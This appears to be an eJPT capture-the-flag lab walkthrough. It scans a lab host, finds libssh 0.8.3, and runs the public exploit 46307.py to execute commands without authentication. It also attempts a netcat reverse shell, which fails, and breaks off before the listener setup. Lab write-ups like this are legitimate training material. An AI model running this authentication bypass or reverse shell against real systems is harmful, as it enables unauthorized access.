Welcome to the Post-Exploitation CTF1 lab from eJPT. This will be a walkthrough to help guide you to correct paths in this lab.
Attacking IP: 192.81.171.2
Target1.ine.local - 192.81.171.4
Target2.ine.local - 192.81.171.3
Our first target wants us to go after the user account details to find our first flag. Let’s start enumerating.
nmap -sV -sC 192.81.171.4
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2025-12-31 23:44 IST
Nmap scan report for target1.ine.local (192.81.171.4)
Host is up (0.000025s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh libssh 0.8.3 (protocol 2.0)
| ssh-hostkey:
|_ 2048 31:e2:1d:f1:b2:39:0c:a3:ec:db:01:4a:eb:a2:39:c7 (RSA)
MAC Address: 02:42:C0:51:AB:04 (Unknown)
port 22 - libssh
libssh isn’t a standard ssh service and is likely our way in. Let’s run a searchsploit against it and see what we find
searchsploit libssh
libSSH - Authentication Bypass | linux/remote/45638.py
LibSSH 0.7.6 / 0.8.4 - Unauthorized Access | linux/remote/46307.py
We’ll go ahead and bring the unauthorized access script to our system to use.
We can test this exploit since it’s used to bypass authorization. We can run the exploit in a command like this
python3 46307.py target1.ine.local 22 whoami
user
It works! This shows that the target is vulnerable to this.
Now we will try to setup a reverse shell through the target. We’ll run the same command but use netcat instead of whoami
python3 46307.py target1.ine.local 22 nc
sh: line 1: nc: command not found
This tells us that the system does not have nc installed on it. To proceed next we’ll setup a listener on our attacking machine.